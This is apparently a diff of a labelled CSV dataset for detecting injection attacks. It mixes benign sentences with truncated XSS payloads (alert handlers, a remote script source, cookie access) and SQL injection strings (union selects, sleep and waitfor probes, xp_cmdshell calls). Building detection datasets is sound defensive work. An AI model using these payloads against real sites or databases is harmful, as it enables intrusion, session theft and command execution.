onkeyup=""alert(1)"" contenteditable>test</s",1,XSS,8817 +"<tbody onmousedown=""alert(1)"">test</tbody>",1,XSS,2409 +Lulu & Georgia: Up to 70% off select items in semi,0,normal,25902 +"<base onclick=""alert(1)"">test</base>",1,XSS,3468 +"1 ) ) and extractvalue ( 7982,concat ( 0x5c,0x7171",2,SQLi,15513 +1' ) and 8514 = ( select count ( * ) from domain.d,2,SQLi,16395 +""",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay",2,SQLi,10900 +or pg_sleep(5)--,2,SQLi,10366 +"{""id"":null,""firstName"":""Willie"",""lastName"":""Lam"",""",0,normal,27247 +1 ) ) or ( select * from ( select ( sleep ( 5 ) ) ,2,SQLi,19140 "<XSS STYLE=""behavior: url(%(htc)s);"">",1,XSS,755 -"This week, we select kumquats, pears, and a mushro",0,normal,25294 +Thus it is possible to select a comparator from a ,0,normal,25291 <script>/* *\x00/javascript:alert(1)// */</script>,1,XSS,444 -"1 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113",2,SQLi,16597 -1' or sleep ( 5 ) and 'yudo' = 'yudo,2,SQLi,18737 +1 ) where 5048 = 5048 or char ( 119 ) ||char ( 100,2,SQLi,16595 +1 ) where 6424 = 6424,2,SQLi,18735 "\\"";alert('XSS');//",1,XSS,973 "<body onPropertyChange body onPropertyChange=""java",1,XSS,377 -", if is_srvrolemember ( 'sysadmin' ) > 0 waitfor d",2,SQLi,11653 -"{""id"":null,""firstName"":""Damien"",""lastName"":""Goh"",""",0,normal,27209 +select * from users where id = 1 union select @<@$,2,SQLi,11655 +-4324 order by 1--,2,SQLi,18710 "<SCRIPT ="">"" SRC=""http://ha.ckers.org/xss.js""></SC",1,XSS,826 "<div style=""list-style:url(http://foo.f)\20url(jav",1,XSS,705 -"1%"" union all select null,null,null,null,null,null",2,SQLi,19933 -1'+ ( select 'jkgf' where 7487 = 7487,2,SQLi,22042 -select pg_sleep ( 5 ) and ( ( 'enpn' like 'enpn,2,SQLi,12205 -"<fieldset onmousemove=""alert(1)"">test</fieldset>",1,XSS,2656 -This window allows you to select different options,0,normal,25293 --9145' ) or 5903 = ( 'qqpjq'|| ( select case 5903 ,2,SQLi,13143 -Insert memory.,0,normal,23054 -<button onClick=javascript:alert(1)>,1,XSS,9593 -"1"" ) and 6510 = ( select count ( * ) from sysusers",2,SQLi,18004 -select ( case when ( 8711 = 6432 ) then 1 else 871,2,SQLi,14031 -"-1772 ) ) or 1570 = convert ( int, ( select char (",2,SQLi,20015 -"<IMG LOWSRC=\javascript:alert('XSS')\"">",1,XSS,1292 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10530 -Select the best.,0,normal,24786 -<menuitem id=x tabindex=1 onbeforeactivate=alert(1,1,XSS,3443 -"1%' ) union all select null,null,null--",2,SQLi,14166 -"-4205' ) or 1570 = convert ( int, ( select char ( ",2,SQLi,17557 -<listing onpointerdown=alert(1)>XSS</listing>,1,XSS,6821 -"1"" ) ) as whyr where 9731 = 9731 rlike ( select * ",2,SQLi,17635 -1'+ ( select plhk where 6540 = 6540,2,SQLi,18484 -"iif ( 5257 = 5257,1,1/0 )",2,SQLi,19886 -"<datalist onmouseleave=""alert(1)"">test</datalist>",1,XSS,2338 -"<img onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,8639 -<dt id=x tabindex=1 onactivate=alert(1)></dt>,1,XSS,4873 -"<strike onkeypress=""alert(1)"" contenteditable>test",1,XSS,3067 -"<optgroup oncopy=""alert(1)"" contenteditable>test</",1,XSS,7983 -Aggregate data where valid.,0,normal,23316 -1'+ ( select 'tbfj' where 4016 = 4016,2,SQLi,18938 -"1"" ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ",2,SQLi,13814 -"1"" ) where 6478 = 6478 union all select null,null,",2,SQLi,12994 -"<strike oncut=""alert(1)"" contenteditable>test</str",1,XSS,3910 --6519' ) ) as tdlt where 5040 = 5040 or 1570 = con,2,SQLi,12775 -"1"" ) as firv where 4522 = 4522 or 2367 = ( select ",2,SQLi,20161 -<wbr onpointerenter=alert(1)>XSS</wbr>,1,XSS,2640 -1' or ( select 2* ( if ( ( select * from ( select ,2,SQLi,18874 +"1%"" ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,19931 +"-1816"" ) or 1570 = convert ( int, ( select char ( ",2,SQLi,22040 +1' ) where 7629 = 7629 rlike ( select * from ( sel,2,SQLi,12207 +"<th onmousemove=""alert(1)"">test</th>",1,XSS,2657 +"Thus Mr Papillon considered that, while the teachi",0,normal,25290 +1' ) or 1022 = ( select count ( * ) from all_users,2,SQLi,13145 +"1"" ) where 8953 = 8953 or 5356 = ( select count ( ",2,SQLi,17375 +<button onControlSelect=javascript:alert(1)>,1,XSS,9595 +1%' ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) |,2,SQLi,18002 +-8504 where 3086 = 3086 or 1131 = 9188#,2,SQLi,14033 +1'|| ( select 'ycya' from dual where 3536 = 3536 a,2,SQLi,20013 +"<IMG DYNSRC=\""javascript:alert('XSS')\"">",1,XSS,1293 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10532 +I'll select wine.,0,normal,24783 +"<label draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,3445 +-4108' ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 11,2,SQLi,14168 +"1"" ) ) and extractvalue ( 7982,concat ( 0x5c,0x717",2,SQLi,17555 +"<i onclick=""alert(1)"">test</i>",1,XSS,6823 +Select replace.,0,normal,24759 +"1 and make_set ( 6911 = 1867,1867 )",2,SQLi,19830 +1' ) or 8156 = ( select count ( * ) from generate_,2,SQLi,19932 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2339 +<nextid onpointerover=alert(1)>XSS</nextid>,1,XSS,8641 +<audio id=x tabindex=1 onactivate=alert(1)></audio,1,XSS,4875 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3068 +<style>:target {color:red;}</style><strike id=x st,1,XSS,7985 +Determine values where valid.,0,normal,23313 +-1385' ) ) ) or 5903 = ( 'qqpjq'|| ( select case 5,2,SQLi,18936 +1' ) or 7552 = ( select count ( * ) from rdb$field,2,SQLi,13816 +"1"" ) as kbjt where 2012 = 2012 and ( 5978 = 6898 )",2,SQLi,12996 +"<abbr onpaste=""alert(1)"" contenteditable>test</abb",1,XSS,3912 +-1277' ) ) ) order by 1--,2,SQLi,12777 +-5062 ) where 7457 = 7457 or 4144 = ( select upper,2,SQLi,20159 +<style>:target {color: red;}</style><li id=x style,1,XSS,2641 +1 where 7906 = 7906 or 8156 = ( select count ( * ),2,SQLi,18872 <div style=content:url(%(svg)s)></div>,1,XSS,704 --1270'|| ( select 'mgdi' where 6785 = 6785 union a,2,SQLi,15320 -<nobr onpointerenter=alert(1)>XSS</nobr>,1,XSS,5173 -<element onpointerenter=alert(1)>XSS</element>,1,XSS,1935 -"waitfor delay '0:0:5' and ""cvqn"" like ""cvqn",2,SQLi,18780 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,13923 -"<style>@keyframes slidein {}</style><audio style=""",1,XSS,4695 -"-2284%"" ) ) or 9323 = 9323#",2,SQLi,15730 -"<thead onmouseover=""alert(1)"">test</thead>",1,XSS,7742 -<legend id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,5527 -Filter the photos.,0,normal,22845 -"<style>@keyframes x{}</style><video style=""animati",1,XSS,8032 -1%' ) and 2716 = ( select count ( * ) from sysuser,2,SQLi,14226 -"<style>@keyframes x{}</style><col style=""animation",1,XSS,2805 -<abbr onpointerup=alert(1)>XSS</abbr>,1,XSS,8273 -"-8580' ) union all select 3428,3428,3428,3428,3428",2,SQLi,19203 -1' ) as nftr where 8825 = 8825 or ( select * from ,2,SQLi,17585 -1' ) ) as oyad where 7161 = 7161 and 6240 = ( 'qqp,2,SQLi,17828 -"<noscript oncut=""alert(1)"" contenteditable>test</n",1,XSS,8654 -"<html oncut=""alert(1)"" contenteditable>test</html>",1,XSS,4662 -"<multicol onbeforepaste=""alert(1)"" contenteditable",1,XSS,8946 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11115 -<kbd id=x tabindex=1 onbeforeactivate=alert(1)></k,1,XSS,3767 -"1"" ) ) and char ( 120 ) ||char ( 106 ) ||char ( 11",2,SQLi,18128 --4518 where 8023 = 8023 or 6872 = 6872--,2,SQLi,21618 -"-1956"" ) where 1448 = 1448 or 3440 = cast ( ( chr ",2,SQLi,18017 -<output id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,4130 -"&lt;A HREF=\""http&#58;//%77%77%77%2E%67%6F%6F%67%6",1,XSS,1050 -"-4318"" ) as vpvt where 5543 = 5543 union all selec",2,SQLi,16955 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8668 -1'|| ( select 'lljg' from dual where 7631 = 7631,2,SQLi,18069 -1 ) where 2307 = 2307,2,SQLi,21994 -"1' ) and elt ( 4249 = 4249,7259 ) and ( 'bkag' = '",2,SQLi,13338 +"1"" or 4240 = ( select 4240 from pg_sleep ( 5 ) ) -",2,SQLi,15322 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5175 +<footer id=x tabindex=1 onactivate=alert(1)></foot,1,XSS,1936 +"-3667%' ) ) union all select 3560,3560,3560--",2,SQLi,18778 +"-5125 union all select 5720,5720,5720,5720,5720,57",2,SQLi,13925 +"<source onmouseout=""alert(1)"">test</source>",1,XSS,4697 +"1"" or exp ( ~ ( select * from ( select concat ( 0x",2,SQLi,15722 +"<style>@keyframes x{}</style><meta style=""animatio",1,XSS,7744 +"<template onmousedown=""alert(1)"">test</template>",1,XSS,5529 +Insert the disc.,0,normal,22842 +<style id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,8034 +1' and 6537 = dbms_pipe.receive_message ( chr ( 76,2,SQLi,14228 +"<meta onmousedown=""alert(1)"">test</meta>",1,XSS,2806 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,8275 +1,0,normal,26686 +Carefully select the menu.,0,normal,24339 +I picked some fresh herbs from the backyard.,0,normal,23816 +<svg><aside onload=alert(1)></aside>,1,XSS,8656 +"<style>@keyframes x{}</style><sub style=""animation",1,XSS,4664 +"<footer draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,8948 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11117 +"<link onmousemove=""alert(1)"">test</link>",1,XSS,3769 +"1"" ) as dien where 4022 = 4022",2,SQLi,17887 +"1"" ) ) as fmul where 7827 = 7827",2,SQLi,21616 +1' ) ) as pdcl where 6964 = 6964,2,SQLi,18015 +"echo('IPT>alert("""")</SCRIPT>')",1,XSS,4132 +"&lt;A HREF=\""http&#58;//1113982867/\""&gt;XSS&lt;/A",1,XSS,1051 +"1"" where 1982 = 1982",2,SQLi,16953 +"<video onclick=""alert(1)"">test</video>",1,XSS,8670 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,20247 +1'|| ( select 'eils' where 8308 = 8308 or 8514 = b,2,SQLi,21992 +1' ) or 9643 = ( select count ( * ) from domain.do,2,SQLi,13340 "{""id"":null,""firstName"":""Nanny"",""lastName"":""Julie"",",0,normal,27534 -select,0,normal,26614 -1 ) as wust where 3884 = 3884 and 8189 = ( select ,2,SQLi,12553 +"1' ) and make_set ( 8403 = 8403,8899 )",2,SQLi,21968 +"-3955%' ) ) union all select 7999,7999,7999,7999,7",2,SQLi,12555 "<iframe srcdoc=""&lt;img src=1 onerror=alert(1)&gt;",1,XSS,172 -"-6629%"" ) ) ) or 8571 = 8571--",2,SQLi,18965 -1 ) ) as msug where 3503 = 3503 and sleep ( 5 ) #,2,SQLi,13586 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,18963 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,13588 "<XML ID=I><X><C><![CDATA[<IMG SRC=""javas]]<![CDATA",1,XSS,790 -"1"" ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5",2,SQLi,20386 -Where can I select a movie for our movie night?,0,normal,23870 -1 ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) |,2,SQLi,14048 -"union (select NULL, (select @@version)) --",2,SQLi,10049 -<dialog id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,4618 -"-8609' union all select 9384,9384,9384,9384--",2,SQLi,19714 +"-4381 or make_set ( 6118 = 3095,3095 ) # lkcr",2,SQLi,20481 +I'm planning to pick up some supplies.,0,normal,23867 +"-9156' ) ) union all select 9110,9110,9110,9110#",2,SQLi,14050 +"union (select NULL, NULL, NULL, (select @@version)",2,SQLi,10051 +"<object onmouseup=""alert(1)"">test</object>",1,XSS,4620 +"1"" ) rlike ( select * from ( select ( sleep ( 5 ) ",2,SQLi,19712 <body/onload=&lt;!--&gt;&#10alert(1)>,1,XSS,909 -A vacancy among the fellows is filled up by the pr,0,normal,26427 -create,0,normal,23109 -"<audio onmouseout=""alert(1)"">test</audio>",1,XSS,2294 -"{""id"":null,""name"":""below""}",0,normal,26934 -exec master..xp_cmdshell 'net+view',2,SQLi,10034 -"-7715' ) union all select 4830,4830,4830,4830,4830",2,SQLi,15085 -"<dfn onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,7274 -"<blockquote onkeypress=""alert(1)"" contenteditable>",1,XSS,5652 -"1"" ) where 4038 = 4038 or 4240 = ( select 4240 fro",2,SQLi,17976 -1%' ) ) ) or char ( 117 ) ||char ( 111 ) ||char ( ,2,SQLi,14089 -"-8588' union all select 2135,2135--",2,SQLi,14867 +1 ) as otsb where 8380 = 8380 or 7427 = dbms_pipe.,2,SQLi,17987 +insert,0,normal,23106 +<body onpointermove=alert(1)>XSS</body>,1,XSS,2295 +Tickets go on sale for select shows on April 83.,0,normal,25286 +exec master..xp_cmdshell 'ping+<attackerip>',2,SQLi,10036 +"-9572%"" ) or 1570 = convert ( int, ( select char (",2,SQLi,15087 +"<!--#exec cmd=""/bin/echo '<SCR'""-->",1,XSS,7276 +"<tfoot ondblclick=""alert(1)"">test</tfoot>",1,XSS,5654 +"1%"" ) ) and 8189 = ( select count ( * ) from sysib",2,SQLi,17974 +1 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||,2,SQLi,14091 +1' ) as pudv where 2609 = 2609,2,SQLi,14869 "<META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://",1,XSS,758 -"1"" where 5098 = 5098 and 2853 = cast ( ( chr ( 113",2,SQLi,22257 -<rtc onpointerleave=alert(1)>XSS</rtc>,1,XSS,4122 -"1"" ) as eaxo where 2728 = 2728",2,SQLi,19328 -al\u0065rt`1`,1,XSS,9394 -"1' ) ) procedure analyse ( extractvalue ( 5840,con",2,SQLi,12999 -1%' ) ) or 8421 = ( select count ( * ) from genera,2,SQLi,15101 -"<bdi onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,8304 -Whatever you select will delete all transcripts wi,0,normal,25160 -<br onfocusout=alert(1) tabindex=1 id=x></br><inpu,1,XSS,7230 -"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTY",1,XSS,1702 -"<sub ondblclick=""alert(1)"">test</sub>",1,XSS,5880 -As it would be impossible within the limits of thi,0,normal,26350 -1' and 7756 = dbms_utility.sqlid_to_sqlhash ( ( ch,2,SQLi,15074 +-9841 where 4612 = 4612 union all select 4612--,2,SQLi,16912 +"<content onmouseout=""alert(1)"">test</content>",1,XSS,4124 +"1%"" ) ) ) and 8312 = dbms_pipe.receive_message ( c",2,SQLi,20773 +\u{61}lert(1),1,XSS,9396 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,13001 +1 where 8180 = 8180 or sleep ( 5 ) #,2,SQLi,15103 +"<textarea onmouseenter=""alert(1)"">test</textarea>",1,XSS,8306 +"When in a store buying fabric, select your fabric ",0,normal,25157 +<ruby onfocusout=alert(1) tabindex=1 id=x></ruby><,1,XSS,7232 +"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTY",1,XSS,1703 +<optgroup onpointermove=alert(1)>XSS</optgroup>,1,XSS,5882 +As they're offering up to 43% off select Delsey Pa,0,normal,26347 +"1 ) where 2678 = 2678 union all select null,null,n",2,SQLi,15076 "<xss oncontextmenu=""alert(1)"" style=display:block>",1,XSS,57 <script language='javascript' src='%(jscript)s'></,1,XSS,731 -"1"" ) as ikdo where 4128 = 4128",2,SQLi,20967 +"1' ) ) and updatexml ( 3393,concat ( 0x2e,0x717170",2,SQLi,18254 "&lt;IMG LOWSRC=\""javascript&#058;alert('XSS')\""&gt",1,XSS,979 -Where should I insert it?,0,normal,23466 -"1"" and 6537 = dbms_pipe.receive_message ( chr ( 76",2,SQLi,21118 -"-3729' ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( c",2,SQLi,13399 -"<IFRAME SRC=""javascript:document.vulnerable=true;""",1,XSS,1500 -<wbr id=x tabindex=1 onfocus=alert(1)></wbr>,1,XSS,7731 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7571 -<style>:target {color: red;}</style><tfoot id=x st,1,XSS,6195 -He decided to order a classic burger.,0,normal,22950 -"1%' ) union all select null,null,null,null,null,nu",2,SQLi,14743 -"select * from users where id = 1 or "";]"" or 1 = 1 ",2,SQLi,11747 -"<iframe onkeydown=""alert(1)"" contenteditable>test<",1,XSS,8302 -1' ) as woka where 4316 = 4316 and 5556 = ( select,2,SQLi,17356 -"<tr onkeyup=""alert(1)"" contenteditable>test</tr>",1,XSS,4961 -"-4222' ) union all select 9267,9267,9267,9267,9267",2,SQLi,13830 -1'|| ( select 'flre' where 8250 = 8250 or 8421 = (,2,SQLi,21503 -"<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vul",1,XSS,1478 -"{""id"":null,""firstName"":""Nguan Eng"",""lastName"":""Tan",0,normal,26784 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,12270 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4365 -"When you select that, green dots float around the ",0,normal,25142 -But paying to select a seat doesn't necessarily me,0,normal,26306 -select * from users where id = 1 union select 1 1a,2,SQLi,11859 -1' where 6417 = 6417 or char ( 117 ) ||char ( 111 ,2,SQLi,16320 -1'|| ( select 'pyga' from dual where 8501 = 8501 o,2,SQLi,17632 -1' ) ) ) and 3754 = ( select upper ( xmltype ( chr,2,SQLi,13006 -"1' ) ) ) or updatexml ( 1808,concat ( 0x2e,0x71717",2,SQLi,17247 -"<bdi ondblclick=""alert(1)"">test</bdi>",1,XSS,5734 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,20690 -1 ) or sleep ( 5 ) and ( 2211 = 2211,2,SQLi,21758 -"select * from users where id = 1 or 1#""{ union sel",2,SQLi,11579 -"1' ) ) ) and make_set ( 8403 = 8403,8899 ) and ( (",2,SQLi,15305 -"<b draggable=""true"" ondragend=""alert(1)"">test</b>",1,XSS,7700 -Delete the outdated files.,0,normal,22661 -Where clause for filtering.,0,normal,23442 -"<dt oncopy=""alert(1)"" contenteditable>test</dt>",1,XSS,6640 -1' where 3701 = 3701 and 2006 = 2006,2,SQLi,15377 -<var id=x tabindex=1 onfocus=alert(1)></var>,1,XSS,3654 -1 ) or 2633 = dbms_pipe.receive_message ( chr ( 11,2,SQLi,12834 -"1"" or ( select 9173 from ( select count ( * ) ,con",2,SQLi,19312 -"-9886%' ) ) ) union all select 5191,5191,5191,5191",2,SQLi,20293 -<embed id=x onfocusin=alert(1) type=text/html>,1,XSS,2417 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,14397 -"{""id"":null,""firstName"":""Willie"",""lastName"":""Lam"",""",0,normal,27247 -"<;STYLE>;.XSS{background-image:url("";javascript:al",1,XSS,1615 -"1"" order by 1#",2,SQLi,19136 --7175' or 4493 = utl_inaddr.get_host_address ( chr,2,SQLi,13792 -<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+X,1,XSS,9274 -1' ) ) ) and 6537 = dbms_pipe.receive_message ( ch,2,SQLi,12685 -`'><script>\xE2\x80\x82javascript:alert(532)</scri,1,XSS,8977 -You can select to view the film with optional Engl,0,normal,25075 -1 ) as rtpl where 1262 = 1262 and 3202 = like ( 'a,2,SQLi,14165 -"1' ) where 9006 = 9006 union all select null,null,",2,SQLi,16222 -"The service, called Swiggy Go, is currently limite",0,normal,25375 -"<div oncopy=""alert(1)"" contenteditable>test</div>",1,XSS,2367 -1%' ) ) ) or 7427 = dbms_pipe.receive_message ( ch,2,SQLi,16735 -"-2276"" ) ) as qwow where 2321 = 2321 or 3534 = 297",2,SQLi,14236 -Where's the reiki practitioner?,0,normal,23648 -<x oncut=alert(1)>copy this!,1,XSS,9348 -1'+ ( select 'xqjx' where 7048 = 7048 and 9198 = 9,2,SQLi,13821 -"-3731' ) ) ) or elt ( 7540 = 1412,1412 ) and ( ( (",2,SQLi,21729 -"<textarea onclick=""alert(1)"">test</textarea>",1,XSS,4787 -"<style>@keyframes x{}</style><ul style=""animation-",1,XSS,3997 -"<meter draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,7075 -"1"" ) ) and 6414 = ( select count ( * ) from rdb$fi",2,SQLi,20851 -<strike onpointerenter=alert(1)>XSS</strike>,1,XSS,7541 -1' ) ) as dckd where 1794 = 1794,2,SQLi,13106 -"<optgroup draggable=""true"" ondragstart=""alert(1)"">",1,XSS,3680 -Select the right path for your journey.,0,normal,24125 -Getting herself fired allowed Trump to select a no,0,normal,26142 -1' or 4411 = ( select count ( * ) from sysusers as,2,SQLi,18271 -1%' ) ) or 8156 = ( select count ( * ) from genera,2,SQLi,15876 -1' ) ) or 9643 = ( select count ( * ) from domain.,2,SQLi,16704 -waitfor delay '0:0:5' and ( ( 'uvlf' = 'uvlf,2,SQLi,21263 -1' ) ) as qhpv where 7049 = 7049 and make_set ( 84,2,SQLi,19190 -The service was available only to users who subscr,0,normal,25376 -( select ( case when ( 9337 = 9337 ) then waitfor ,2,SQLi,21748 -"-4929"" where 6381 = 6381 or 8571 = 8571--",2,SQLi,22378 -1 ) ) as oywa where 7951 = 7951 union all select n,2,SQLi,21367 -"<picture draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,8409 -I'm thinking of where to have a quiet getaway.,0,normal,23841 -"<menu onmouseout=""alert(1)"">test</menu>",1,XSS,4971 -Select a topic for the presentation.,0,normal,24180 -<var onpointerover=alert(1)>XSS</var>,1,XSS,5532 -waitfor delay '0:0:5' and ( ( ( 'ozjl' like 'ozjl,2,SQLi,18635 -"?goto,javascript:alert(1)"",",1,XSS,9863 -<script>function x(window) { eval(location.hash.su,1,XSS,9293 -"<iframe ondblclick=""alert(1)"">test</iframe>",1,XSS,6102 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6396 -"1"" ) ) and 8514 = ( select count ( * ) from domain",2,SQLi,12900 -<mark onpointerenter=alert(1)>XSS</mark>,1,XSS,6636 -"<nav draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,5609 -select * from users where id = 1 or ( \. ) = 1 uni,2,SQLi,11553 -Randomly select a honeymoon song.,0,normal,24397 -"1"" ) as qirf where 6200 = 6200 ( select ( case whe",2,SQLi,22321 -<style>:target {color:red;}</style><bdo id=x style,1,XSS,8094 -"-6492' ) union all select 7204,7204--",2,SQLi,15158 -Where's the chiropractor?,0,normal,23631 -"<strong draggable=""true"" ondrag=""alert(1)"">test</s",1,XSS,4879 -"<style>@keyframes x{}</style><optgroup style=""anim",1,XSS,3805 -"<shadow onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,8772 -Select support.,0,normal,24735 -"<dt onbeforecopy=""alert(1)"" contenteditable>test</",1,XSS,6487 -1' ) and ( select * from ( select ( sleep ( 5 ) ) ,2,SQLi,17820 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,19259 -"1%"" ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ""%""",2,SQLi,19592 -"<progress draggable=""true"" ondragleave=""alert(1)"">",1,XSS,7664 -"{""id"":null,""firstName"":""Frank"",""lastName"":""Lay"",""s",0,normal,27025 -select ( case when ( 4774 = 1535 ) then 4774 else ,2,SQLi,15497 -1' ) where 8429 = 8429,2,SQLi,13269 -1' ) as uvxl where 6211 = 6211 procedure analyse (,2,SQLi,20468 -"1' ) or elt ( 6272 = 6272,sleep ( 5 ) )",2,SQLi,20695 --2216 ) ) as hxmq where 5677 = 5677 union all sele,2,SQLi,16582 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10490 -1,0,normal,26681 -Filter the feed.,0,normal,22863 -<td onpointerleave=alert(1)>XSS</td>,1,XSS,7547 -"1"" ) where 2837 = 2837 and ( 3020 = 3020 ) *6703--",2,SQLi,17793 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7695 -";1lblah""<iframe/onload=confirm(document.domain);><",1,XSS,8956 -Find and select Users & Groups from the System Pre,0,normal,26194 -1' ) where 1804 = 1804 procedure analyse ( extract,2,SQLi,18729 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,16990 -1' ) ) as zqeg where 4729 = 4729 and ( 1098 = 9682,2,SQLi,15026 -1%' or 4240 = ( select 4240 from pg_sleep ( 5 ) ) ,2,SQLi,12736 -"<command draggable=""true"" ondrag=""alert(1)"">test</",1,XSS,8837 -"-7868"" union all select 1805--",2,SQLi,18443 --8513 ) or 4493 = utl_inaddr.get_host_address ( ch,2,SQLi,21760 -1 ) ) ) or 8156 = ( select count ( * ) from genera,2,SQLi,15598 -1 ) as zqxa where 5718 = 5718 and 3580 = ( select ,2,SQLi,17760 -"-8005"" ) union all select 5213,5213,5213,5213,5213",2,SQLi,20912 -<blockquote onpointerenter=alert(1)>XSS</blockquot,1,XSS,2341 -"top[""al""+""ert""](1)",1,XSS,9382 -"<big onclick=""alert(1)"">test</big>",1,XSS,2914 -"You can select movies, TV shows or both, select a ",0,normal,25081 -Where did you get that fantastic idea from?,0,normal,23823 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7005 -"1, ( cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 11",2,SQLi,22224 -The Primary Consideration In The Definition Of A U,0,normal,25389 -1 ) ) as ztcn where 1043 = 1043 and 6305 = 5785--,2,SQLi,17347 -<param onpointerout=alert(1)>XSS</param>,1,XSS,6228 -"-5300' union all select 2750,2750,2750,2750,2750,2",2,SQLi,14842 -or ( EXISTS ),2,SQLi,11789 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10591 -"-7806"" ) ) or ( 8459 = 8459 ) *4906 and ( ( ""vlrj""",2,SQLi,14469 -Merge the puzzle sections.,0,normal,22660 -\u{0000000061}lert(1),1,XSS,9395 -select sleep ( 5 ) and ( ( ( 'etzb' = 'etzb,2,SQLi,21050 -1' where 5004 = 5004 or 7552 = ( select count ( * ,2,SQLi,13485 -"<SCRIPT/SRC=""http://.rocks/.js""></SCRIPT>",1,XSS,7208 -Select the ideal location.,0,normal,24270 -Select Comfort – Select Comfort lost two cents per,0,normal,25638 -"<style>@keyframes slidein {}</style><param style=""",1,XSS,2478 -"<area onmousemove=""alert(1)"">test</area>",1,XSS,8675 -1' and 6414 = ( select count ( * ) from rdb$fields,2,SQLi,17094 -"-2601' ) union all select 2866,2866,2866,2866,2866",2,SQLi,20686 -Select the best playlist for your mood.,0,normal,24214 -<animate onpointerenter=alert(1)>XSS</animate>,1,XSS,4559 -waitfor delay '0:0:5' ) +',2,SQLi,19607 -"1"" ) ) as dksq where 7161 = 7161",2,SQLi,14882 -"AllowScriptAccess=""always""",1,XSS,7905 -1'|| ( select 'hbho' from dual where 7193 = 7193,2,SQLi,13928 -Specify criteria where valid.,0,normal,23307 -"{""id"":null,""firstName"":""Arun"",""lastName"":""Kumar"",""",0,normal,27614 -1%' ) ) and char ( 111 ) ||char ( 77 ) ||char ( 12,2,SQLi,18795 -Select your dream team.,0,normal,24334 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,16831 -"As for the color, you might want to select some sw",0,normal,26351 -"1"" and extractvalue ( 7982,concat ( 0x5c,0x7171706",2,SQLi,13618 -"<base onkeypress=""alert(1)"" contenteditable>test</",1,XSS,7040 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6438 -select sleep ( 5 ) and ( 'dcys' like 'dcys,2,SQLi,12863 -<picture onpointerout=alert(1)>XSS</picture>,1,XSS,6022 -1 ) or sleep ( __TIME__ ) #,2,SQLi,11490 -"<svg xmlns=""#""><script>alert(1)</script></svg>",1,XSS,1127 -<b id=x tabindex=1 ondeactivate=alert(1)></b><inpu,1,XSS,3940 -"<dir onmouseenter=""alert(1)"">test</dir>",1,XSS,7309 -"{""id"":null,""name"":""Venusaur""}",0,normal,27086 -<script onpointerenter=alert(1)>XSS</script>,1,XSS,6635 -Where's the bed and breakfast?,0,normal,23551 --8023' in boolean mode ) order by 1#,2,SQLi,17556 -"-1339 ) ) ) union all select 6318,6318,6318,6318,6",2,SQLi,21135 -Select surprise.,0,normal,24729 -"<;A HREF="";http://0x42.0x0000066.0x7.0x93/"";>;XSS<",1,XSS,1670 -"""Mike Wallace is Here"" premieres in select theater",0,normal,26458 -"1' and make_set ( 8403 = 8403,8899 ) and 'fttd' li",2,SQLi,16111 -"1 ) union all select null,null,null,null--",2,SQLi,15866 -"<progress oncut=""alert(1)"" contenteditable>test</p",1,XSS,8177 -“><s”%2b”cript>alert(document.cookie)</script>,1,XSS,939 -1' ) ) as hfra where 6500 = 6500 and 9660 = ( sele,2,SQLi,13478 